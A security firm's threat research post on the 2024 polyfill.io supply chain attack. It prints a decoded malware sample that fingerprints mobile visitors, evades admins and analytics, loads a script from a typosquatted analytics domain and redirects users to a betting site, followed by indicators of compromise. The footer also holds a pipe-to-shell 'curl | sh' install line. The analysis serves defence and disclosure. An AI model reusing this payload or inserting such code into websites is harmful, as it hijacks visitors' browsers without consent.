https://sansec.io/research/polyfill-supply-chain-attack

 
Scan your store now
Scan your
store now
Sansec

  * Product
  * Pricing
  * Resources
         
      + Research 
      + Partners 
      + Guides 
      + Malware
  * Company
  * Contact

Sansec logo
Sansec logo

  * Product
  * Pricing
  * Resources
  * Company
  * Contact

  * Research
  * Partners
  * Support

Scan your store now!

Polyfill supply chain attack hits 100K+ sites

Sansec

by Sansec Forensics Team

Published in Threat Research - June 25, 2024

The new Chinese owner of the popular Polyfill JS project injects
malware into more than 100 thousand sites.

Polyfill supply chain attack hits 100K+ sites
Update June 25th: Google has already started blocking Google Ads for
eCommerce sites that use polyfill.io.

The polyfill.js is a popular open source library to support older
browsers. 100K+ sites embed it using the cdn.polyfill.io domain.
Notable users are JSTOR, Intuit and World Economic Forum. However, in
February this year, a Chinese company bought the domain and the
Github account. Since then, this domain was caught injecting malware
on mobile devices via any site that embeds cdn.polyfill.io. Any
complaints were quickly removed (archive here) from the Github
repository.

The polyfill code is dynamically generated based on the HTTP headers,
so multiple attack vectors are likely. Sansec decoded one particular
malware (see below) which redirects mobile users to a sports betting
site using a fake Google analytics domain (www.googie-anaiytics.com).
The code has specific protection against reverse engineering, and
only activates on specific mobile devices at specific hours. It also
does not activate when it detects an admin user. It also delays
execution when a web analytics service is found, presumably to not
end up in the stats.

The original polyfill author recommends to not use Polyfill at all,
as it is no longer needed by modern browsers anyway. Meanwhile, both
Fastly and Cloudflare have put up trustworthy alternatives, if you
still need it.

This incident is a typical example of a supply chain attack. To get
visibility into the code that your users are loading, we recommend
our (free) CSP monitoring service Sansec Watch.

Our eComscan backend scanner has also been updated with polyfill.io
detection.

Polyfill malicious payload example

We added some names for readability, however tiaozhuan came from the
original malware (which means "jump" in Chinese).

function isPc() {
  try {
    var _isWin =
        navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac =
        navigator.platform == "Mac68K" ||
        navigator.platform == "MacPPC" ||
        navigator.platform == "Macintosh" ||
        navigator.platform == "MacIntel";
    if (_isMac || _isWin) {
      return true;
    } else {
      return false;
    }
  } catch (_0x44e1f6) {
    return false;
  }
}
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS(
      "https://www.googie-anaiytics.com/html/checkcachehw.js",
      function () {
        if (usercache == true) {
          window.location.href = _0x5ae1f8;
        }
      }
    );
}
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(
    /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
  );
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();
    if (
      _curHost.indexOf("www.dxtv1.com") !== -1 ||
      _curHost.indexOf("www.ys752.com") !== -1
    ) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else {
      if (_curHost.indexOf("shuanshu.com.com") !== -1) {
        _redirectURL = "https://kuurza.com/redirect?from=bitget";
      } else {
        if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
          _redirectURL = "https://kuurza.com/redirect?from=bitget";
        } else {
          if (_hours >= 0 && _hours < 2) {
            if (_rnd <= 10) {
              _redirectURL = _kuurzaBitGet;
            }
          } else {
            if (_hours >= 2 && _hours < 4) {
              _rnd <= 15 && (_redirectURL = _kuurzaBitGet);
            } else {
              if (_hours >= 4 && _hours < 7) {
                _rnd <= 20 && (_redirectURL = _kuurzaBitGet);
              } else {
                _hours >= 7 && _hours < 8
                  ? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
                  : _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
              }
            }
          }
        }
      }
    }
    _redirectURL != "" &&
      !isPc() &&
      document.cookie.indexOf("admin_id") == -1 &&
      document.cookie.indexOf("adminlevels") == -1 &&
      vfed_update(_redirectURL);
  }
}
let _outerPage = document.documentElement.outerHTML,
  bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
  wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
  aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
  aplausix = _outerPage.indexOf(".plausible.io") != -1,
  statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
  ? setTimeout(check_tiaozhuan, 2000)
  : check_tiaozhuan();

Indicators of compromise

https://kuurza.com/redirect?from=bitget
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/ga.js

Read more

  * CosmicSting attack threatens 75% of Adobe Commerce stores
  * Persistent Magento backdoor hidden in XML
  * Sansec joins forces with Google's VirusTotal
  * Sansec and Europol counter online skimming
  * Magento wish list exploit bypasses WAF protection

In this article

 1. Polyfill malicious payload example
 2. Indicators of compromise

[malware]

Easy CSP for your store?

Try Sansec Watch! Free, simple and fully integrated. Get PCI
compliant alerting with minimal effort.

Sansec Watch

Scan your store now
for malware & vulnerabilities

$ curl ecomscan.com | sh
copy code

eComscan is the most thorough security scanner for Magento, Adobe
Commerce, Shopware, WooCommerce and many more.

Learn more
Terminal window
eComscan demo

Made with 

Sansec BV
Wolvenplein 25 - S.2
3512 CK Utrecht
The Netherlands
[email protected]
Sansec mascotte Pango
ProductPricingGuidesPartners About Magecart Malware library Media
coverage System status
ResearchCompanyContact Telegram Login

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security

TwitterLinkedinEmail

Terms & Conditions
|
Privacy & Cookie Policy
|
Company Reg 77165187
|
Tax NL860920306B01

spacer